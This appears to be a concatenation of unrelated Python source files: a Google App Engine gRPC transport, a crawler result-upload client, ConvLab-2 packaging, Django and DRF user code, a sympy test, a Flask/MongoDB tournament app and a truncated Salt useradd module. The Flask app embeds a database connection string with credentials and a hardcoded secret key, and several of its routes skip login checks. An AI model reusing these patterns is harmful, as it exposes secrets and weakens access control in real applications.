from grpc.experimental import aio # type: ignore
from google.cloud.appengine_admin_v1.types import appengine
from google.cloud.appengine_admin_v1.types import service
from google.longrunning import operations_pb2 # type: ignore
from .base import ServicesTransport, DEFAULT_CLIENT_INFO
from .grpc import ServicesGrpcTransport
class ServicesGrpcAsyncIOTransport(ServicesTransport):
"""gRPC AsyncIO backend transport for Services.
Manages services of an application.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(cls,
host: str = 'appengine.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
def __init__(self, *,
host: str = 'appengine.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
self._operations_client = None
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsAsyncClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Sanity check: Only create a new client if we do not already have one.
if self._operations_client is None:
self._operations_client = operations_v1.OperationsAsyncClient(
self.grpc_channel
)
# Return the client from cache.
return self._operations_client
@property
def list_services(self) -> Callable[
[appengine.ListServicesRequest],
Awaitable[appengine.ListServicesResponse]]:
r"""Return a callable for the list services method over gRPC.
Lists all the services in the application.
Returns:
Callable[[~.ListServicesRequest],
Awaitable[~.ListServicesResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'list_services' not in self._stubs:
self._stubs['list_services'] = self.grpc_channel.unary_unary(
'/google.appengine.v1.Services/ListServices',
request_serializer=appengine.ListServicesRequest.serialize,
response_deserializer=appengine.ListServicesResponse.deserialize,
)
return self._stubs['list_services']
@property
def get_service(self) -> Callable[
[appengine.GetServiceRequest],
Awaitable[service.Service]]:
r"""Return a callable for the get service method over gRPC.
Gets the current configuration of the specified
service.
Returns:
Callable[[~.GetServiceRequest],
Awaitable[~.Service]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'get_service' not in self._stubs:
self._stubs['get_service'] = self.grpc_channel.unary_unary(
'/google.appengine.v1.Services/GetService',
request_serializer=appengine.GetServiceRequest.serialize,
response_deserializer=service.Service.deserialize,
)
return self._stubs['get_service']
@property
def update_service(self) -> Callable[
[appengine.UpdateServiceRequest],
Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the update service method over gRPC.
Updates the configuration of the specified service.
Returns:
Callable[[~.UpdateServiceRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'update_service' not in self._stubs:
self._stubs['update_service'] = self.grpc_channel.unary_unary(
'/google.appengine.v1.Services/UpdateService',
request_serializer=appengine.UpdateServiceRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs['update_service']
@property
def delete_service(self) -> Callable[
[appengine.DeleteServiceRequest],
Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the delete service method over gRPC.
Deletes the specified service and all enclosed
versions.
Returns:
Callable[[~.DeleteServiceRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'delete_service' not in self._stubs:
self._stubs['delete_service'] = self.grpc_channel.unary_unary(
'/google.appengine.v1.Services/DeleteService',
request_serializer=appengine.DeleteServiceRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs['delete_service']
def close(self):
return self.grpc_channel.close()
__all__ = (
'ServicesGrpcAsyncIOTransport',
)
|
py | 1a3472e0f2c813eeca1df06b619cdcd4ffdca488 | # -*- coding: utf-8 -*-
import json
import os
import grpc
from rpc.pb import result_pb2
from rpc.pb.result_pb2_grpc import ResultStub
CHUNK_SIZE = 10 * 1024
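# Client-streaming upload protocol used by get_file_chunks below: the first request
# message carries only the filename, and each following message carries a CHUNK_SIZE
# slice of the file body in its file_data.buffer field.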
def get_file_chunks(filename, folder_path):
yield result_pb2.StreamUploadPictureRequest(filename=filename)
with open(f'/usr/src/app/{folder_path}/' + filename, 'rb') as f:
while True:
piece = f.read(CHUNK_SIZE)
if len(piece) == 0:
return
yield result_pb2.StreamUploadPictureRequest(file_data={"buffer": piece})
def remove_file(file_path):
"""
    Delete a file.
:param file_path:
:return:
"""
try:
os.remove(file_path)
except (NotImplementedError, FileNotFoundError):
pass
class ResultClient(object):
def __init__(self, rpc_server):
        # Channel to the RPC server
channel = grpc.insecure_channel(target=f'{rpc_server}', options=[
('grpc.max_send_message_length', int(os.getenv('GRPC_MAX_SEND_MESSAGE_LENGTH', 200)) * 1024 * 1024),
('grpc.max_receive_message_length', int(os.getenv('GRPC_MAX_RECEIVE_MESSAGE_LENGTH', 200)) * 1024 * 1024),
])
        # Get the Result gRPC service stub
self.stub = ResultStub(channel)
def save_base_result(self, subtask_id, url_id, url_address, finished_at, **kwargs):
"""保存爬虫基本信息"""
        # Serialize the response headers
kwargs['response_headers'] = self.dic2json(kwargs.pop('response_headers', {}))
        # Derive the HTTP status code from the last entry in the redirect chain
kwargs['http_code'] = kwargs['redirect_chain'][-1]['redirect_http_code'] if kwargs['redirect_chain'] else None
        # Drop the default Firefox/Chrome placeholder content
if kwargs['content'] and (kwargs['content'].startswith(
'<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">')
or kwargs['content'] == '<html><head></head><body></body></html>'):
kwargs['content'] = None
        # # Serialize the HTTP interaction archive
# kwargs['http_archive'] = self.dic2json(kwargs.pop('http_archive', []))
self.stub.SaveBaseResult(
result_pb2.SaveBaseResultRequest(
subtask_id=subtask_id, url_id=url_id, url_address=url_address,
finished_at=finished_at, **kwargs),
timeout=30
)
def upload_screenshot(self, screenshot_name):
"""上传截图"""
chunks_generator = get_file_chunks(screenshot_name, folder_path='screenshots')
response = self.stub.StreamUploadPicture(chunks_generator)
file_path = f'/usr/src/app/screenshots/{screenshot_name}'
assert response.length == os.path.getsize(file_path)
remove_file(file_path)
def set_subtask_status(self, subtask_id, status, finished_at):
"""标记子任务爬取状态"""
self.stub.SetSubTaskStatus(
result_pb2.SetSubTaskStatusRequest(
subtask_id=subtask_id,
status=status,
finished_at=finished_at
),
timeout=30
)
def upload_har_file(self, har_file_name):
"""上传har文件"""
chunks_generator = get_file_chunks(har_file_name, folder_path='hars')
response = self.stub.StreamUploadHarFile(chunks_generator)
file_path = f'/usr/src/app/hars/{har_file_name}'
assert response.length == os.path.getsize(file_path)
remove_file(file_path)
@staticmethod
def dic2json(dic):
"""某些字段转换为json"""
return json.dumps(dic, ensure_ascii=False)
|
py | 1a34767707c212c9e8067738af3c29910a60bf4d | tab = ''
def pow(x, n):
global tab
tab += ' '
    if n == 0:
return 1
print(tab+"%d*%d^(%d-%d)" % (x, x, n, 1))
    return x * pow(x, n-1)
print('2^4')
print('answer -->', pow(2, 4))
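# Expected console output (recursion trace, then the result):
#   2^4
#    2*2^(4-1)
#     2*2^(3-1)
#      2*2^(2-1)
#       2*2^(1-1)
#   answer --> 16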
|
py | 1a3477af409f3889378f81a5f47196bf25901e32 | '''
setup.py for ConvLab-2
'''
import sys
import os
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
class LibTest(TestCommand):
def run_tests(self):
# import here, cause outside the eggs aren't loaded
ret = os.system("pytest --cov=ConvLab-2 tests/ --cov-report term-missing")
sys.exit(ret >> 8)
setup(
name='ConvLab-2',
version='0.0.1',
packages=find_packages(exclude=[]),
license='Apache',
description='Task-oriented Dialog System Toolkits',
long_description=open('README.md', encoding='UTF-8').read(),
long_description_content_type="text/markdown",
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
],
install_requires=[
'nltk>=3.4',
'tqdm>=4.30',
'checksumdir>=1.1',
'visdom',
'Pillow',
'future',
'torch',
'numpy>=1.15.0',
'scipy',
'scikit-learn==0.20.3',
'pytorch-pretrained-bert>=0.6.1',
'transformers>=2.3.0',
'tensorflow==1.14',
'tensorboard>=1.14.0',
'tensorboardX==1.7',
'allennlp',
'requests',
'simplejson',
'unidecode',
'jieba'
],
extras_require={
'develop': [
"python-coveralls",
"pytest-dependency",
"pytest-mock",
"requests-mock",
"pytest>=3.6.0",
"pytest-cov==2.4.0",
"checksumdir",
"bs4",
"lxml",
]
},
cmdclass={'test': LibTest},
entry_points={
'console_scripts': [
"ConvLab-2-report=convlab2.scripts:report"
]
},
include_package_data=True,
url='https://github.com/thu-coai/ConvLab-2',
author='thu-coai',
author_email='[email protected]',
python_requires='>=3.5',
zip_safe=False
)
|
py | 1a3477c94a6a4248894fb12f9ff31ee1e7a18b67 | # Generated by Django 1.10.3 on 2016-11-23 10:06
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='DemoModel1',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='DemoModel2',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='DemoModel3',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='DemoModel4',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
),
]
|
py | 1a3477dda27ad0c84c3b014c411242e115f4bfac |
from rest_framework import mixins, status, viewsets
from rest_framework import response
from rest_framework.response import Response
from rest_framework.decorators import action
from cride.users.models import Users
from cride.circles.models import Circle
from cride.circles.serializers import CircleModelSerializer
from cride.users.serializers.profile import ProfileModelSerializer
# * permissions
from rest_framework.permissions import (
AllowAny,
IsAuthenticated
)
from cride.users.permissions import IsAccountOwner
# * Serializer methods
from cride.users.serializers import (
UserLoginSerializer,
UserSignupSerializer,
UserModelSerializer,
AccountVerifySerializer
)
class UserViewSet(
mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
viewsets.GenericViewSet):
"""user view set
handle sign up, login and accointy verifications
Args:
viewsets ([type]): [description]
Returns:
[type]: [description]
"""
queryset = Users.objects.filter(is_active=True, is_cliente=True)
serializer_class = UserModelSerializer
lookup_field = 'username'
def get_permissions(self):
"""Asiigna permision basadas en una accion"""
if self.action in ['signup', 'login', 'verify']:
permissions = [AllowAny]
        elif self.action in ['retrieve', 'update', 'partial_update']:
permissions = [IsAuthenticated, IsAccountOwner]
else:
permissions = [IsAuthenticated]
        return [permission() for permission in permissions]
@action(detail=False, methods=['post'])
def login(self, request):
"""users sign up"""
serializer = UserLoginSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
user, token = serializer.save()
data = {
'user': UserModelSerializer(user).data,
'access_token': token
}
return Response(data, status=status.HTTP_201_CREATED)
@action(detail=False, methods=['post'])
def signup(self, request):
""""User signup"""
serializer = UserSignupSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = serializer.save()
data = UserModelSerializer(user).data
return Response(data, status=status.HTTP_201_CREATED)
@action(detail=False, methods=['post'])
def verify(self, request):
serializer = AccountVerifySerializer(data=request.data)
serializer.is_valid(raise_exception=True)
serializer.save()
data = {
'message': 'Congratulations, now go share some rides!'
}
return Response(data, status=status.HTTP_201_CREATED)
@action(detail=True, methods=['put','patch'])
def profile(self,request,*args, **kwargs):
"""update profile data"""
user = self.get_object()
profile = user.profiles
        partial = request.method == 'PATCH'
serializer = ProfileModelSerializer(
profile,
data = request.data,
partial = partial
)
serializer.is_valid(raise_exception=True)
serializer.save()
data = UserModelSerializer(user).data
return Response(data)
def retrieve(self,request, *args, **kwargs):
"""datros extras para el response"""
response = super(UserViewSet,self).retrieve(request, *args, **kwargs)
circles = Circle.objects.filter(
members = request.user,
membership__is_active = True
)
data = {
'user': response.data,
'circle':CircleModelSerializer(circles, many=True).data,
}
response.data = data
return response |
py | 1a347899c2efc8ae2b8a417dbb422a83cd529c61 | from sympy.ntheory import npartitions
def test_partitions():
assert [npartitions(k) for k in range(13)] == \
[1, 1, 2, 3, 5, 7, 11, 15, 22, 30, 42, 56, 77]
assert npartitions(100) == 190569292
assert npartitions(200) == 3972999029388
assert npartitions(1000) == 24061467864032622473692149727991
assert npartitions(2000) == 4720819175619413888601432406799959512200344166
assert npartitions(10000) % 10**10 == 6916435144
assert npartitions(100000) % 10**10 == 9421098519
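    # npartitions computes the partition function P(n) via the Hardy-Ramanujan-Rademacher
    # series; the two largest checks above compare only the last ten digits because the
    # exact values run to hundreds of digits.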
|
py | 1a3479e24d789e84df758754665da00b5e93c27f | from flask import Flask, render_template, url_for, session, request, redirect, flash
from flask_pymongo import PyMongo
import bcrypt
app = Flask(__name__)
app.config['MONGO_URI'] = "mongodb+srv://Marco:[email protected]/Ludus-Parthenope?retryWrites=true&w=majority"
mongo = PyMongo(app);
@app.route('/')
def index():
if 'username' in session:
return redirect(url_for('home'))
else:
return render_template('login.html')
@app.route('/login', methods=['POST'])
def login():
users = mongo.db.users
login_user = users.find_one({'name' : request.form['username']})
if login_user:
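        # bcrypt check: hashing the submitted password with the stored hash as the salt
        # reproduces the stored hash only when the password is correct.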
if bcrypt.hashpw(request.form['pw'].encode('utf-8'), login_user['password']) == login_user['password']:
session['username'] = request.form['username']
try:
session['team'] = login_user['team']
except:
pass
return redirect(url_for('index'))
else:
flash("Username o password errati")
return redirect(url_for('index'))
@app.route('/logout')
def logout():
session.pop('team', None)
session.pop('username', None)
return redirect(url_for('index'))
@app.route('/register', methods=['POST','GET'])
def register():
if request.method == 'POST':
users = mongo.db.users
existing_user = users.find_one({'name' : request.form['username']})
existing_email = users.find_one({'email' : request.form['email']})
if existing_user is None:
if existing_email is None:
hashpass = bcrypt.hashpw(request.form['pw'].encode('utf-8'), bcrypt.gensalt())
users.insert({'name' : request.form['username'], 'password' : hashpass, 'email' : request.form['email']})
session['username'] = request.form['username']
return redirect(url_for('index'))
else:
flash("Questa email è già stata registrata da un altro utente")
return redirect(url_for('register'))
else:
flash("Esiste già un utente con questo username!")
return redirect(url_for('register'))
return render_template('register.html')
@app.route('/home')
def home():
if 'username' in session:
session.database = mongo.db
return render_template('home.html')
else:
return redirect(url_for('index'))
@app.route('/library')
def library():
if 'username' in session:
session.database = mongo.db
return render_template('library.html')
else:
return redirect(url_for('index'))
@app.route('/join/<torneo>')
def join(torneo):
mongo.db.tournaments.update_one({'name': torneo}, {"$addToSet": {'competitors': session['username']}})
return redirect(url_for('home'))
@app.route('/aggiungi',methods=['POST'])
def aggiungi():
newgame = request.form['add']
user_library = mongo.db.users.find_one({"$and":[{'name': session['username']},{'games': newgame}]})
if user_library:
flash("Gioco già presente in libreria")
return redirect(url_for('library'))
else:
mongo.db.users.update_one({'name': session['username'] }, {"$addToSet": {'games': newgame}})
return redirect(url_for('library'))
@app.route('/search',methods=['POST'])
def search():
risultato = mongo.db.tournaments.find_one({'name': request.form['codice']})
if risultato:
session.ricerca = risultato
return render_template('search.html')
else:
flash("Torneo non trovato")
return redirect(url_for('home'))
@app.route('/admin')
def admin():
if session['username'] == "admin":
session.database = mongo.db
return render_template('admin.html')
else:
return redirect(url_for('home'))
@app.route('/addgame',methods=['POST'])
def addgame():
if mongo.db.games.find_one({'title': request.form['newgame']}):
flash("Gioco già presente")
return redirect(url_for('admin'))
else:
mongo.db.games.insert({'title': request.form['newgame']})
flash("Gioco inserito con successo")
return redirect(url_for('admin'))
@app.route('/addtournament',methods=['POST'])
def addtournament():
if mongo.db.tournaments.find_one({'name': request.form['newtournamentid']}):
flash("Torneo già presente")
return redirect(url_for('admin'))
else:
date= request.form['newtournamentdate'] + " " + request.form['newtournamenthour']
mongo.db.tournaments.insert({'name': request.form['newtournamentid'], 'title': request.form['newtournamentgame'], 'date': date})
flash("Torneo inserito con successo")
return redirect(url_for('admin'))
@app.route('/team')
def team():
if 'username' in session:
session.database = mongo.db
return render_template('team.html')
else:
return redirect(url_for('index'))
@app.route('/searchteam',methods=['POST'])
def searchteam():
risultato = mongo.db.teams.find_one({'name': request.form['teamname']})
if risultato:
mongo.db.users.update_one({'name': session['username']},{"$set": {'team': request.form['teamname']}})
mongo.db.teams.update_one({'name': request.form['teamname']},{"$addToSet":{'users': session['username']}})
session['team'] = request.form['teamname']
return redirect(url_for('team'))
else:
flash("Il team inserito non è stato trovato")
return redirect(url_for('team'))
@app.route('/createteam',methods=['POST'])
def createteam():
risultato = mongo.db.teams.find_one({'name': request.form['teamname']})
if risultato:
flash("Esiste già un team con questo nome")
return redirect(url_for('team'))
else:
mongo.db.teams.insert({'name': request.form['teamname']})
mongo.db.users.update_one({'name': session['username']}, {"$set": {'team': request.form['teamname']}})
mongo.db.teams.update_one({'name': request.form['teamname']}, {"$addToSet": {'users': session['username']}})
session['team'] = request.form['teamname']
return redirect(url_for('team'))
@app.route('/leaveteam')
def leaveteam():
mongo.db.users.update_one({'name': session['username']}, {"$unset": {'team': session['team']}})
mongo.db.teams.update_one({'name': session['team']}, {"$pull": {'users': session['username']}})
numero_membri = mongo.db.teams.find_one({'name': session['team']})
if len(numero_membri['users']) == 0:
mongo.db.teams.delete_one({'name': session['team']})
session.pop('team',None)
return redirect(url_for('team'))
if __name__ == '__main__':
app.run()
app.secret_key = 'super secret key'
|
py | 1a347a77cca73722c2d0897138984aa0dc8ca4de |
def squeeze_dims(da, *args, **kwargs):
"""
:param ds: Xarray DataArray
:param args: sequence of arguments
:param kwargs: dictionary of arguments
:return: Xarray DataArray
"""
da_squeezed = da.squeeze(*args, **kwargs)
return da_squeezed
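# A minimal usage sketch (hypothetical data; assumes numpy and xarray are installed):
if __name__ == "__main__":
    import numpy as np
    import xarray as xr
    da = xr.DataArray(np.zeros((1, 3, 1)), dims=("band", "x", "y"))
    # squeeze drops every length-1 dimension ("band" and "y" here).
    print(squeeze_dims(da).dims)  # -> ('x',)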
|
py | 1a347a8c8f6b7bc416b425448d8354454411bdc3 | # -*- coding: utf-8 -*-
"""
Manage users with the useradd command
.. important::
If you feel that Salt should be using this module to manage users on a
minion, and it is using a different module (or gives an error similar to
*'user.info' is not available*), see :ref:`here
<module-provider-override>`.
"""
from __future__ import absolute_import, print_function, unicode_literals
import copy
import functools
import logging
import os
# Import salt libs
import salt.utils.data
import salt.utils.decorators.path
import salt.utils.files
import salt.utils.stringutils
import salt.utils.user
from salt.exceptions import CommandExecutionError
# Import 3rd-party libs
from salt.ext import six
try:
import pwd
HAS_PWD = True
except ImportError:
HAS_PWD = False
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = "user"
def __virtual__():
"""
Set the user module if the kernel is Linux, OpenBSD, NetBSD or AIX
"""
if HAS_PWD and __grains__["kernel"] in ("Linux", "OpenBSD", "NetBSD", "AIX"):
return __virtualname__
return (
False,
"useradd execution module not loaded: either pwd python library not available or system not one of Linux, OpenBSD, NetBSD or AIX",
)
def _quote_username(name):
"""
Usernames can only contain ascii chars, so make sure we return a str type
"""
if not isinstance(name, six.string_types):
return str(name) # future lint: disable=blacklisted-function
else:
return salt.utils.stringutils.to_str(name)
def _get_gecos(name, root=None):
"""
Retrieve GECOS field info and return it in dictionary form
"""
if root is not None and __grains__["kernel"] != "AIX":
getpwnam = functools.partial(_getpwnam, root=root)
else:
getpwnam = functools.partial(pwd.getpwnam)
gecos_field = salt.utils.stringutils.to_unicode(
getpwnam(_quote_username(name)).pw_gecos
).split(",", 4)
if not gecos_field:
return {}
else:
# Assign empty strings for any unspecified trailing GECOS fields
while len(gecos_field) < 5:
gecos_field.append("")
return {
"fullname": salt.utils.data.decode(gecos_field[0]),
"roomnumber": salt.utils.data.decode(gecos_field[1]),
"workphone": salt.utils.data.decode(gecos_field[2]),
"homephone": salt.utils.data.decode(gecos_field[3]),
"other": salt.utils.data.decode(gecos_field[4]),
}
def _build_gecos(gecos_dict):
"""
Accepts a dictionary entry containing GECOS field names and their values,
and returns a full GECOS comment string, to be used with usermod.
"""
return "{0},{1},{2},{3},{4}".format(
gecos_dict.get("fullname", ""),
gecos_dict.get("roomnumber", ""),
gecos_dict.get("workphone", ""),
gecos_dict.get("homephone", ""),
gecos_dict.get("other", ""),
).rstrip(",")
def _update_gecos(name, key, value, root=None):
"""
Common code to change a user's GECOS information
"""
if value is None:
value = ""
elif not isinstance(value, six.string_types):
value = six.text_type(value)
else:
value = salt.utils.stringutils.to_unicode(value)
pre_info = _get_gecos(name, root=root)
if not pre_info:
return False
if value == pre_info[key]:
return True
gecos_data = copy.deepcopy(pre_info)
gecos_data[key] = value
cmd = ["usermod"]
if root is not None and __grains__["kernel"] != "AIX":
cmd.extend(("-R", root))
cmd.extend(("-c", _build_gecos(gecos_data), name))
__salt__["cmd.run"](cmd, python_shell=False)
return _get_gecos(name, root=root).get(key) == value
def add(
name,
uid=None,
gid=None,
groups=None,
home=None,
shell=None,
unique=True,
system=False,
fullname="",
roomnumber="",
workphone="",
homephone="",
other="",
createhome=True,
loginclass=None,
nologinit=False,
root=None,
usergroup=None,
):
"""
Add a user to the minion
name
Username LOGIN to add
uid
User ID of the new account
gid
Name or ID of the primary group of the new account
groups
List of supplementary groups of the new account
home
Home directory of the new account
shell
Login shell of the new account
unique
If not True, the user account can have a non-unique UID
system
Create a system account
fullname
GECOS field for the full name
roomnumber
GECOS field for the room number
workphone
GECOS field for the work phone
homephone
GECOS field for the home phone
other
GECOS field for other information
createhome
Create the user's home directory
loginclass
Login class for the new account (OpenBSD)
nologinit
Do not add the user to the lastlog and faillog databases
root
Directory to chroot into
usergroup
Create and add the user to a new primary group of the same name
CLI Example:
.. code-block:: bash
salt '*' user.add name <uid> <gid> <groups> <home> <shell>
"""
cmd = ["useradd"]
if shell:
cmd.extend(["-s", shell])
if uid not in (None, ""):
cmd.extend(["-u", uid])
if gid not in (None, ""):
cmd.extend(["-g", gid])
elif usergroup:
cmd.append("-U")
if __grains__["kernel"] != "Linux":
log.warning("'usergroup' is only supported on GNU/Linux hosts.")
elif groups is not None and name in groups:
defs_file = "/etc/login.defs"
if __grains__["kernel"] != "OpenBSD":
try:
with salt.utils.files.fopen(defs_file) as fp_:
for line in fp_:
line = salt.utils.stringutils.to_unicode(line)
if "USERGROUPS_ENAB" not in line[:15]:
continue
if "yes" in line:
cmd.extend(["-g", __salt__["file.group_to_gid"](name)])
# We found what we wanted, let's break out of the loop
break
except OSError:
log.debug(
"Error reading %s", defs_file, exc_info_on_loglevel=logging.DEBUG
)
else:
usermgmt_file = "/etc/usermgmt.conf"
try:
with salt.utils.files.fopen(usermgmt_file) as fp_:
for line in fp_:
line = salt.utils.stringutils.to_unicode(line)
if "group" not in line[:5]:
continue
cmd.extend(["-g", line.split()[-1]])
# We found what we wanted, let's break out of the loop
break
except OSError:
# /etc/usermgmt.conf not present: defaults will be used
pass
# Setting usergroup to False adds the -N command argument. If
# usergroup is None, no arguments are added to allow useradd to go
# with the defaults defined for the OS.
if usergroup is False:
cmd.append("-N")
if createhome:
cmd.append("-m")
elif __grains__["kernel"] != "NetBSD" and __grains__["kernel"] != "OpenBSD":
cmd.append("-M")
if nologinit:
cmd.append("-l")
if home is not None:
cmd.extend(["-d", home])
if not unique and __grains__["kernel"] != "AIX":
cmd.append("-o")
if (
system
and __grains__["kernel"] != "NetBSD"
and __grains__["kernel"] != "OpenBSD"
):
cmd.append("-r")
if __grains__["kernel"] == "OpenBSD":
if loginclass is not None:
cmd.extend(["-L", loginclass])
cmd.append(name)
if root is not None and __grains__["kernel"] != "AIX":
cmd.extend(("-R", root))
ret = __salt__["cmd.run_all"](cmd, python_shell=False)
if ret["retcode"] != 0:
return False
# At this point, the user was successfully created, so return true
# regardless of the outcome of the below functions. If there is a
    # problem with changing any of the user's info below, it will be raised
# in a future highstate call. If anyone has a better idea on how to do
# this, feel free to change it, but I didn't think it was a good idea
# to return False when the user was successfully created since A) the
# user does exist, and B) running useradd again would result in a
# nonzero exit status and be interpreted as a False result.
if groups:
chgroups(name, groups, root=root)
if fullname:
chfullname(name, fullname, root=root)
if roomnumber:
chroomnumber(name, roomnumber, root=root)
if workphone:
